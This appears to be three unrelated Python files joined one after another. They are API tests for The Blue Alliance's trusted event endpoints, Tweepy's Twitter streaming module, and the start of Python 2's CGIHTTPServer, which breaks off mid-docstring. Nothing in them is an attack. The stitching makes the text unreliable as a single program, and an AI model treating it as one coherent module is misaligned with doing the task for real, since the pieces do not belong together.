def test_remapping(self):
self.event_info_auth.put()
self.matches_auth.put()
self.rankings_auth.put()
self.alliances_auth.put()
self.awards_auth.put()
request = {
'remap_teams': {
'frc1': 'frc101B',
'frc2': 'frc102B',
'frc3': 'frc102C',
'frc4': 'frc104'
},
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
# Test remapped matches
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
'dqs': ['frc1', 'frc2', 'frc3']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
request_path = '/api/trusted/v1/event/2014casj/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# verify remapped match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc101B'])
self.assertEqual(match.alliances['red']['dqs'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
self.assertEqual(set(match.team_key_names), set(['frc101B', 'frc102B', 'frc102C', 'frc104', 'frc5', 'frc6']))
# Test remapped alliances
alliances = [['frc1', 'frc2', 'frc3'],
['frc4', 'frc5', 'frc6'],
['frc7', 'frc8', 'frc9']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped rankings
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc1', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc2', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc3', 'rank': 3, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc4', 'rank': 4, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc5', 'rank': 5, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc6', 'rank': 6, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# verify remapped alliances
self.assertEqual(len(self.event.alliance_selections), 3)
self.assertEqual(self.event.alliance_selections[0]['picks'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(self.event.alliance_selections[1]['picks'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(self.event.alliance_selections[2]['picks'], ['frc7', 'frc8', 'frc9'])
# verify remapped rankings
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '101B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[2], [2, '102B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[3], [3, '102C', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[4], [4, '104', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[5], [5, '5', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[6], [6, '6', 20, 500, 500, 200, '10-0-0', 0, 10])
# Test remapped awards
awards = [{'name_str': 'Winner', 'team_key': 'frc1'},
{'name_str': 'Winner', 'team_key': 'frc2'},
{'name_str': 'Winner', 'team_key': 'frc3'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc4', 'awardee': 'Bob Bobby'},
{'name_str': 'Chairman\'s Blahblah', 'team_key': 'frc5'},
{'name_str': 'Finalist', 'team_key': 'frc6'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
for team in Award.get_by_id('2014casj_1').recipient_dict.keys():
self.assertTrue(str(team) in {'101B', '102B', '102C'})
for team in Award.get_by_id('2014casj_5').recipient_dict.keys():
self.assertTrue(str(team) in {'104'})
for team in Award.get_by_id('2014casj_0').recipient_dict.keys():
self.assertTrue(str(team) in {'5'})
for team in Award.get_by_id('2014casj_2').recipient_dict.keys():
self.assertTrue(str(team) in {'6'})
def test_remapping_after(self):
self.event_info_auth.put()
self.matches_auth.put()
self.rankings_auth.put()
self.alliances_auth.put()
self.awards_auth.put()
# Test remapped matches
matches = [{
'comp_level': 'f',
'set_number': 1,
'match_number': 2,
'alliances': {
'red': {'teams': ['frc1', 'frc2', 'frc3'],
'score': 250,
'surrogates': ['frc1'],
'dqs': ['frc1', 'frc2', 'frc3']},
'blue': {'teams': ['frc4', 'frc5', 'frc6'],
'score': 260,
'surrogates': [],
'dqs': []},
},
'score_breakdown': {
'red': {'auto': 20, 'assist': 40, 'truss+catch': 20, 'teleop_goal+foul': 20},
'blue': {'auto': 40, 'assist': 60, 'truss+catch': 10, 'teleop_goal+foul': 40},
},
'time_string': '11:00 AM',
'time_utc': '2014-08-31T18:00:00',
}]
request_body = json.dumps(matches)
request_path = '/api/trusted/v1/event/2014casj/matches/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_1', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped alliances
alliances = [['frc1', 'frc2', 'frc3'],
['frc4', 'frc5', 'frc6'],
['frc7', 'frc8', 'frc9']]
request_body = json.dumps(alliances)
request_path = '/api/trusted/v1/event/2014casj/alliance_selections/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_3', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped rankings
rankings = {
'breakdowns': ['QS', 'Auton', 'Teleop', 'T&C', 'wins', 'losses', 'ties'],
'rankings': [
{'team_key': 'frc1', 'rank': 1, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc2', 'rank': 2, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc3', 'rank': 3, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc4', 'rank': 4, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc5', 'rank': 5, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
{'team_key': 'frc6', 'rank': 6, 'wins': 10, 'losses': 0, 'ties': 0, 'played': 10, 'dqs': 0, 'QS': 20, 'Auton': 500, 'Teleop': 500, 'T&C': 200},
],
}
request_body = json.dumps(rankings)
request_path = '/api/trusted/v1/event/2014casj/rankings/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_2', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Test remapped awards
awards = [{'name_str': 'Winner', 'team_key': 'frc1'},
{'name_str': 'Winner', 'team_key': 'frc2'},
{'name_str': 'Winner', 'team_key': 'frc3'},
{'name_str': 'Volunteer Blahblah', 'team_key': 'frc4', 'awardee': 'Bob Bobby'},
{'name_str': 'Chairman\'s Blahblah', 'team_key': 'frc5'},
{'name_str': 'Finalist', 'team_key': 'frc6'}]
request_body = json.dumps(awards)
request_path = '/api/trusted/v1/event/2014casj/awards/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_4', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
# Set remapping
request = {
'remap_teams': {
'frc1': 'frc101B',
'frc2': 'frc102B',
'frc3': 'frc102C',
'frc4': 'frc104'
},
}
request_body = json.dumps(request)
request_path = '/api/trusted/v1/event/2014casj/info/update'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_9', 'X-TBA-Auth-Sig': sig})
self.assertEqual(response.status_code, 200)
# Run tasks
tasks = self.taskqueue_stub.GetTasks('admin')
for task in tasks:
self.cronapp.get(task["url"])
# verify remapped match data
match = Match.get_by_id('2014casj_f1m2')
self.assertEqual(match.time, datetime.datetime(2014, 8, 31, 18, 0))
self.assertEqual(match.time_string, '11:00 AM')
self.assertEqual(match.alliances['red']['teams'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.alliances['red']['score'], 250)
self.assertEqual(match.alliances['red']['surrogates'], ['frc101B'])
self.assertEqual(match.alliances['red']['dqs'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(match.score_breakdown['red']['truss+catch'], 20)
self.assertEqual(match.alliances['blue']['teams'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(match.alliances['blue']['score'], 260)
self.assertEqual(match.alliances['blue']['surrogates'], [])
self.assertEqual(match.alliances['blue']['dqs'], [])
self.assertEqual(set(match.team_key_names), set(['frc101B', 'frc102B', 'frc102C', 'frc104', 'frc5', 'frc6']))
# verify remapped alliances
self.assertEqual(len(self.event.alliance_selections), 3)
self.assertEqual(self.event.alliance_selections[0]['picks'], ['frc101B', 'frc102B', 'frc102C'])
self.assertEqual(self.event.alliance_selections[1]['picks'], ['frc104', 'frc5', 'frc6'])
self.assertEqual(self.event.alliance_selections[2]['picks'], ['frc7', 'frc8', 'frc9'])
# verify remapped rankings
self.assertEqual(self.event.rankings[0], ['Rank', 'Team', 'QS', 'Auton', 'Teleop', 'T&C', 'Record (W-L-T)', 'DQ', 'Played'])
self.assertEqual(self.event.rankings[1], [1, '101B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[2], [2, '102B', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[3], [3, '102C', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[4], [4, '104', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[5], [5, '5', 20, 500, 500, 200, '10-0-0', 0, 10])
self.assertEqual(self.event.rankings[6], [6, '6', 20, 500, 500, 200, '10-0-0', 0, 10])
# verify remapped awards
for team in Award.get_by_id('2014casj_1').recipient_dict.keys():
self.assertTrue(str(team) in {'101B', '102B', '102C'})
for team in Award.get_by_id('2014casj_5').recipient_dict.keys():
self.assertTrue(str(team) in {'104'})
for team in Award.get_by_id('2014casj_0').recipient_dict.keys():
self.assertTrue(str(team) in {'5'})
for team in Award.get_by_id('2014casj_2').recipient_dict.keys():
self.assertTrue(str(team) in {'6'})
def test_zebra_motionworks_add(self):
self.event_zebra_motionworks.put()
match1 = Match(
id="2014casj_qm1",
alliances_json="""{"blue": {"score": -1, "teams": ["frc1", "frc2", "frc3"]}, "red": {"score": -1, "teams": ["frc254", "frc971", "frc604"]}}""",
comp_level="qm",
event=ndb.Key(Event, '2014casj'),
year=2014,
set_number=1,
match_number=1,
team_key_names=[u'frc254', u'frc971', u'frc604', u'frc1', u'frc2', u'frc3'],
youtube_videos=["abcdef"]
)
data = [{
"key": "2014casj_qm1",
"times": [0.0, 0.5, 1.0, 1.5],
"alliances": {
"red": [
{
"team_key": "frc254",
"xs": [None, 1.2, 1.3, 1.4],
"ys": [None, 0.1, 0.1, 0.1],
},
{
"team_key": "frc971",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
{
"team_key": "frc604",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
],
"blue": [
{
"team_key": "frc1",
"xs": [None, 1.2, 1.3, 1.4],
"ys": [None, 0.1, 0.1, 0.1],
},
{
"team_key": "frc2",
"xs": [1.1, 1.2, 1.3, 1.4],
"ys": [0.1, 0.1, 0.1, 0.1],
},
{
"team_key": "frc3",
"xs": [1.1, 1.2, None, 1.4],
"ys": [0.1, 0.1, None, 0.1],
},
],
}
}]
# Verify failure if Match doesn't exist
request_body = json.dumps(data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Add match
match1.put()
# Verify bad event_key doesn't get added
bad_data = copy.deepcopy(data)
bad_data[0]['key'] = '2019casj_qm1'
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify malformatted data doesn't get added
bad_data = copy.deepcopy(data)
del bad_data[0]['times'][0]
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify teams must be the same
bad_data = copy.deepcopy(data)
bad_data[0]['alliances']['red'][0]['team_key'] = 'frc9999'
request_body = json.dumps(bad_data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 400)
self.assertIsNone(ZebraMotionWorks.get_by_id('2014casj_qm1'))
# Verify correctly added data
request_body = json.dumps(data)
request_path = '/api/trusted/v1/event/2014casj/zebra_motionworks/add'
sig = md5.new('{}{}{}'.format('321tEsTsEcReT', request_path, request_body)).hexdigest()
response = self.testapp.post(request_path, request_body, headers={'X-TBA-Auth-Id': 'tEsT_id_10', 'X-TBA-Auth-Sig': sig}, expect_errors=True)
self.assertEqual(response.status_code, 200)
self.assertEqual(ZebraMotionWorks.get_by_id('2014casj_qm1').data, data[0])
|
|
# Tweepy
# Copyright 2009-2010 Joshua Roesslein
# See LICENSE for details.
# Appengine users: https://developers.google.com/appengine/docs/python/sockets/#making_httplib_use_sockets
from __future__ import absolute_import, print_function
import logging
import re
import requests
import sys
from requests.exceptions import Timeout
from threading import Thread
from time import sleep
import six
import ssl
from tweepy.models import Status
from tweepy.api import API
from tweepy.error import TweepError
from tweepy.utils import import_simplejson
json = import_simplejson()
STREAM_VERSION = '1.1'
class StreamListener(object):
def __init__(self, api=None):
self.api = api or API()
def on_connect(self):
"""Called once connected to streaming server.
This will be invoked once a successful response
is received from the server. Allows the listener
to perform some work prior to entering the read loop.
"""
pass
def on_data(self, raw_data):
"""Called when raw data is received from connection.
Override this method if you wish to manually handle
the stream data. Return False to stop stream and close connection.
"""
data = json.loads(raw_data)
if 'in_reply_to_status_id' in data:
status = Status.parse(self.api, data)
if self.on_status(status) is False:
return False
elif 'delete' in data:
delete = data['delete']['status']
if self.on_delete(delete['id'], delete['user_id']) is False:
return False
elif 'event' in data:
status = Status.parse(self.api, data)
if self.on_event(status) is False:
return False
elif 'direct_message' in data:
status = Status.parse(self.api, data)
if self.on_direct_message(status) is False:
return False
elif 'friends' in data:
if self.on_friends(data['friends']) is False:
return False
elif 'limit' in data:
if self.on_limit(data['limit']['track']) is False:
return False
elif 'disconnect' in data:
if self.on_disconnect(data['disconnect']) is False:
return False
elif 'warning' in data:
if self.on_warning(data['warning']) is False:
return False
else:
logging.error("Unknown message type: " + str(raw_data))
def keep_alive(self):
"""Called when a keep-alive arrived"""
return
def on_status(self, status):
"""Called when a new status arrives"""
return
def on_exception(self, exception):
"""Called when an unhandled exception occurs."""
return
def on_delete(self, status_id, user_id):
"""Called when a delete notice arrives for a status"""
return
def on_event(self, status):
"""Called when a new event arrives"""
return
def on_direct_message(self, status):
"""Called when a new direct message arrives"""
return
def on_friends(self, friends):
"""Called when a friends list arrives.
friends is a list that contains user_id
"""
return
def on_limit(self, track):
"""Called when a limitation notice arrives"""
return
def on_error(self, status_code):
"""Called when a non-200 status code is returned"""
return False
def on_timeout(self):
"""Called when stream connection times out"""
return
def on_disconnect(self, notice):
"""Called when twitter sends a disconnect notice
Disconnect codes are listed here:
https://dev.twitter.com/docs/streaming-apis/messages#Disconnect_messages_disconnect
"""
return
def on_warning(self, notice):
"""Called when a disconnection warning message arrives"""
return
class ReadBuffer(object):
"""Buffer data from the response in a smarter way than httplib/requests can.
Tweets are roughly in the 2-12kb range, averaging around 3kb.
Requests/urllib3/httplib/socket all use socket.read, which blocks
until enough data is returned. On some systems (eg google appengine), socket
reads are quite slow. To combat this latency we can read big chunks,
but the blocking part means we won't get results until enough tweets
have arrived. That may not be a big deal for high throughput systems.
For low throughput systems we don't want to sacrafice latency, so we
use small chunks so it can read the length and the tweet in 2 read calls.
"""
def __init__(self, stream, chunk_size, encoding='utf-8'):
self._stream = stream
self._buffer = six.b('')
self._chunk_size = chunk_size
self._encoding = encoding
def read_len(self, length):
while not self._stream.closed:
if len(self._buffer) >= length:
return self._pop(length)
read_len = max(self._chunk_size, length - len(self._buffer))
self._buffer += self._stream.read(read_len)
return six.b('')
def read_line(self, sep=six.b('\n')):
"""Read the data stream until a given separator is found (default \n)
:param sep: Separator to read until. Must by of the bytes type (str in python 2,
bytes in python 3)
:return: The str of the data read until sep
"""
start = 0
while not self._stream.closed:
loc = self._buffer.find(sep, start)
if loc >= 0:
return self._pop(loc + len(sep))
else:
start = len(self._buffer)
self._buffer += self._stream.read(self._chunk_size)
return six.b('')
def _pop(self, length):
r = self._buffer[:length]
self._buffer = self._buffer[length:]
return r.decode(self._encoding)
class Stream(object):
host = 'stream.twitter.com'
def __init__(self, auth, listener, **options):
self.auth = auth
self.listener = listener
self.running = False
self.timeout = options.get("timeout", 300.0)
self.retry_count = options.get("retry_count")
# values according to
# https://dev.twitter.com/docs/streaming-apis/connecting#Reconnecting
self.retry_time_start = options.get("retry_time", 5.0)
self.retry_420_start = options.get("retry_420", 60.0)
self.retry_time_cap = options.get("retry_time_cap", 320.0)
self.snooze_time_step = options.get("snooze_time", 0.25)
self.snooze_time_cap = options.get("snooze_time_cap", 16)
# The default socket.read size. Default to less than half the size of
# a tweet so that it reads tweets with the minimal latency of 2 reads
# per tweet. Values higher than ~1kb will increase latency by waiting
# for more data to arrive but may also increase throughput by doing
# fewer socket read calls.
self.chunk_size = options.get("chunk_size", 512)
self.verify = options.get("verify", True)
self.api = API()
self.headers = options.get("headers") or {}
self.new_session()
self.body = None
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
def new_session(self):
self.session = requests.Session()
self.session.headers = self.headers
self.session.params = None
def _run(self):
# Authenticate
url = "https://%s%s" % (self.host, self.url)
# Connect and process the stream
error_counter = 0
resp = None
exc_info = None
while self.running:
if self.retry_count is not None:
if error_counter > self.retry_count:
# quit if error count greater than retry count
break
try:
auth = self.auth.apply_auth()
resp = self.session.request('POST',
url,
data=self.body,
timeout=self.timeout,
stream=True,
auth=auth,
verify=self.verify)
if resp.status_code != 200:
if self.listener.on_error(resp.status_code) is False:
break
error_counter += 1
if resp.status_code == 420:
self.retry_time = max(self.retry_420_start,
self.retry_time)
sleep(self.retry_time)
self.retry_time = min(self.retry_time * 2,
self.retry_time_cap)
else:
error_counter = 0
self.retry_time = self.retry_time_start
self.snooze_time = self.snooze_time_step
self.listener.on_connect()
self._read_loop(resp)
except (Timeout, ssl.SSLError) as exc:
# This is still necessary, as a SSLError can actually be
# thrown when using Requests
# If it's not time out treat it like any other exception
if isinstance(exc, ssl.SSLError):
if not (exc.args and 'timed out' in str(exc.args[0])):
exc_info = sys.exc_info()
break
if self.listener.on_timeout() is False:
break
if self.running is False:
break
sleep(self.snooze_time)
self.snooze_time = min(self.snooze_time + self.snooze_time_step,
self.snooze_time_cap)
except Exception as exc:
exc_info = sys.exc_info()
# any other exception is fatal, so kill loop
break
# cleanup
self.running = False
if resp:
resp.close()
self.new_session()
if exc_info:
# call a handler first so that the exception can be logged.
self.listener.on_exception(exc_info[1])
six.reraise(*exc_info)
def _data(self, data):
if self.listener.on_data(data) is False:
self.running = False
def _read_loop(self, resp):
charset = resp.headers.get('content-type', default='')
enc_search = re.search('charset=(?P<enc>\S*)', charset)
if enc_search is not None:
encoding = enc_search.group('enc')
else:
encoding = 'utf-8'
buf = ReadBuffer(resp.raw, self.chunk_size, encoding=encoding)
while self.running and not resp.raw.closed:
length = 0
while not resp.raw.closed:
line = buf.read_line().strip()
if not line:
self.listener.keep_alive() # keep-alive new lines are expected
elif line.isdigit():
length = int(line)
break
else:
raise TweepError('Expecting length, unexpected value found')
next_status_obj = buf.read_len(length)
if self.running and next_status_obj:
self._data(next_status_obj)
# # Note: keep-alive newlines might be inserted before each length value.
# # read until we get a digit...
# c = b'\n'
# for c in resp.iter_content(decode_unicode=True):
# if c == b'\n':
# continue
# break
#
# delimited_string = c
#
# # read rest of delimiter length..
# d = b''
# for d in resp.iter_content(decode_unicode=True):
# if d != b'\n':
# delimited_string += d
# continue
# break
#
# # read the next twitter status object
# if delimited_string.decode('utf-8').strip().isdigit():
# status_id = int(delimited_string)
# next_status_obj = resp.raw.read(status_id)
# if self.running:
# self._data(next_status_obj.decode('utf-8'))
if resp.raw.closed:
self.on_closed(resp)
def _start(self, async):
self.running = True
if async:
self._thread = Thread(target=self._run)
self._thread.start()
else:
self._run()
def on_closed(self, resp):
""" Called when the response has been closed by Twitter """
pass
def userstream(self,
stall_warnings=False,
_with=None,
replies=None,
track=None,
locations=None,
async=False,
encoding='utf8'):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/user.json' % STREAM_VERSION
self.host = 'userstream.twitter.com'
if stall_warnings:
self.session.params['stall_warnings'] = stall_warnings
if _with:
self.session.params['with'] = _with
if replies:
self.session.params['replies'] = replies
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.session.params['locations'] = ','.join(['%.2f' % l for l in locations])
if track:
self.session.params['track'] = u','.join(track).encode(encoding)
self._start(async)
def firehose(self, count=None, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/firehose.json' % STREAM_VERSION
if count:
self.url += '&count=%s' % count
self._start(async)
def retweet(self, async=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/retweet.json' % STREAM_VERSION
self._start(async)
def sample(self, async=False, languages=None, stall_warnings=False):
self.session.params = {'delimited': 'length'}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/sample.json' % STREAM_VERSION
if languages:
self.session.params['language'] = ','.join(map(str, languages))
if stall_warnings:
self.session.params['stall_warnings'] = 'true'
self._start(async)
def filter(self, follow=None, track=None, async=False, locations=None,
stall_warnings=False, languages=None, encoding='utf8', filter_level=None):
self.body = {}
self.session.headers['Content-type'] = "application/x-www-form-urlencoded"
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/statuses/filter.json' % STREAM_VERSION
if follow:
self.body['follow'] = u','.join(follow).encode(encoding)
if track:
self.body['track'] = u','.join(track).encode(encoding)
if locations and len(locations) > 0:
if len(locations) % 4 != 0:
raise TweepError("Wrong number of locations points, "
"it has to be a multiple of 4")
self.body['locations'] = u','.join(['%.4f' % l for l in locations])
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if languages:
self.body['language'] = u','.join(map(str, languages))
if filter_level:
self.body['filter_level'] = filter_level.encode(encoding)
self.session.params = {'delimited': 'length'}
self.host = 'stream.twitter.com'
self._start(async)
def sitestream(self, follow, stall_warnings=False,
with_='user', replies=False, async=False):
self.body = {}
if self.running:
raise TweepError('Stream object already connected!')
self.url = '/%s/site.json' % STREAM_VERSION
self.body['follow'] = u','.join(map(six.text_type, follow))
self.body['delimited'] = 'length'
if stall_warnings:
self.body['stall_warnings'] = stall_warnings
if with_:
self.body['with'] = with_
if replies:
self.body['replies'] = replies
self._start(async)
def disconnect(self):
if self.running is False:
return
self.running = False
|
|
"""CGI-savvy HTTP Server.
This module builds on SimpleHTTPServer by implementing GET and POST
requests to cgi-bin scripts.
If the os.fork() function is not present (e.g. on Windows),
os.popen2() is used as a fallback, with slightly altered semantics; if
that function is not present either (e.g. on Macintosh), only Python
scripts are supported, and they are executed by the current process.
In all cases, the implementation is intentionally naive -- all
requests are executed sychronously.
SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL
-- it may execute arbitrary Python code or external programs.
"""
__version__ = "0.4"
__all__ = ["CGIHTTPRequestHandler"]
import os
import sys
import urllib
import BaseHTTPServer
import SimpleHTTPServer
class CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):
"""Complete HTTP server with GET, HEAD and POST commands.
GET and HEAD also support running CGI scripts.
The POST command is *only* implemented for CGI scripts.
"""
# Determine platform specifics
have_fork = hasattr(os, 'fork')
have_popen2 = hasattr(os, 'popen2')
# Make rfile unbuffered -- we need to read one line and then pass
# the rest to a subprocess, so we can't use buffered input.
rbufsize = 0
def do_POST(self):
"""Serve a POST request.
This is only implemented for CGI scripts.
"""
if self.is_cgi():
self.run_cgi()
else:
self.send_error(501, "Can only POST to CGI scripts")
def send_head(self):
"""Version of send_head that support CGI scripts"""
if self.is_cgi():
return self.run_cgi()
else:
return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)
def is_cgi(self):
"""Test whether self.path corresponds to a CGI script.
Return a tuple (dir, rest) if self.path requires running a
CGI script, None if not. Note that rest begins with a
slash if it is not empty.
The default implementation tests whether the path
begins with one of the strings in the list
